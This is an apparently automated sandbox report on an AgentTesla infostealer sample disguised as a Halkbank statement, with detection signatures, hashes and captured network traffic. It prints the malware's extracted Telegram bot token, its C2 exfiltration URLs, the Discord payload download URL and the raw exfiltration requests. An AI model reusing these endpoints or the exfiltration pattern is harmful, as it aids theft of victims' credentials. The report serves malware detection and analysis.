Windows Analysis Report
Halkbank_Ekstre_20220513_082357_541079.exe

Overview

General Information

Sample Name: Halkbank_Ekstre_20220513_082357_541079.exe
Analysis ID: 626599
MD5: bef71f070519aad800bf09d7d5a7659b
SHA1: 2d276da3aefc56f4fa91cfaaf7e766f48f1d6140
SHA256: 969bf771ed84b11bc61cff977691a938687d043ca13b851efa7a627ef58b90b0
Tags: AgentTeslaexegeoHalkbankTUR
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected MSILDownloaderGeneric
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 15.0.InstallUtil.exe.400000.4.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5388276304", "Chat URL": "https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument"}
Source: InstallUtil.exe.1028.15.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendMessage"}
Multi AV Scanner detection for submitted file
Source: Halkbank_Ekstre_20220513_082357_541079.exe Virustotal: Detection: 34% Perma Link
Source: Halkbank_Ekstre_20220513_082357_541079.exe ReversingLabs: Detection: 39%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe ReversingLabs: Detection: 39%
Machine Learning detection for sample
Source: Halkbank_Ekstre_20220513_082357_541079.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 15.0.InstallUtil.exe.400000.4.unpack Avira: Label: TR/Spy.Gen8
Source: 15.0.InstallUtil.exe.400000.1.unpack Avira: Label: TR/Spy.Gen8
Source: 15.0.InstallUtil.exe.400000.2.unpack Avira: Label: TR/Spy.Gen8
Source: 15.0.InstallUtil.exe.400000.3.unpack Avira: Label: TR/Spy.Gen8
Source: 15.2.InstallUtil.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 15.0.InstallUtil.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Uses 32bit PE files
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49789 version: TLS 1.2
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: protobuf-net.pdbSHA256 source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 4x nop then jmp 06486E90h 0_2_06486A67
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 0_2_0648AA14
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 17_2_055BBD5C
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 17_2_055BBD51
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh 17_2_055BC848
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh 17_2_055BC83D
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 17_2_055BC729
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then jmp 055B6E90h 17_2_055B6A67

Networking
barindex
Yara detected MSILDownloaderGeneric
Source: Yara match File source: Process Memory Space: Halkbank_Ekstre_20220513_082357_541079.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Ffnbziuo.exe PID: 4600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Ffnbziuo.exe PID: 4568, type: MEMORYSTR
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bfc9e9f2a6Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35c0aab288a2Host: api.telegram.orgContent-Length: 1895Expect: 100-continue
Source: global traffic HTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bce6fc6661Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bce7a34abcHost: api.telegram.orgContent-Length: 1895Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bceb536d8fHost: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bceb87e14bHost: api.telegram.orgContent-Length: 1895Expect: 100-continue
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: InstallUtil.exe, 0000000F.00000002.532228765.0000000003548000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532614975.0000000003581000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: InstallUtil.exe, 0000000F.00000002.539231225.00000000065BA000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000003.491091731.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://qguwMz.com
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.389756600.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.529463502.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ffnbziuo.exe, 00000011.00000002.529534251.00000000022CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000000.385913370.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.548623792.0000000008269000.00000004.00000001.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.545199356.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.544867705.00000000032A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/
Source: InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocumentdocument-----
Source: InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org4dk
Source: InstallUtil.exe, 0000000F.00000002.532614975.0000000003581000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.orgD8dkh
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.389756600.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.529463502.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com
Source: Ffnbziuo.exe, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp
Source: Halkbank_Ekstre_20220513_082357_541079.exe, Ffnbziuo.exe.0.dr String found in binary or memory: https://cdn.discordapp.com/attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp/Xcf
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 0000000F.00000002.532077311.000000000352B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.531824600.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532228765.0000000003548000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rBRWiNLNwm.com
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bfc9e9f2a6Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49789 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.2.Ffnbziuo.exe.335c788.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.4174768.1.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.2.Ffnbziuo.exe.3334768.1.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.2.Ffnbziuo.exe.33ac7a8.3.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
.NET source code contains very large array initializations
Source: 15.0.InstallUtil.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Source: 15.0.InstallUtil.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
